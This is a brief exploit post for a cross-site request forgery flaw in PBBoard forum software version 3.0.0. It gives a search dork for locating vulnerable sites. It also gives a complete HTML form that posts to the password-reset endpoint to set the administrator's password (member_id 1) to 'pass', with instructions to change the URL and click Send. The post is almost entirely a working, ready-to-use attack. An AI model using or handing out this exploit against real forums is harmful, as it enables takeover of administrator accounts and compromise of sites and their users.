Open a new html file and put the code below with changing
PBBoard Version 3.0.0 CSRF Vulnerability
Dork:Powered by PBBoard © Version 3.0.0
the url and click Send
Code:
HTML Code:
<form action="http://localhost/pbboard/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="pass">
<input type="submit" name="Submit" value="Send">
</form>
member_id For the user id (default value is 1 for admin)
new_password the new password to change for(default password is pass)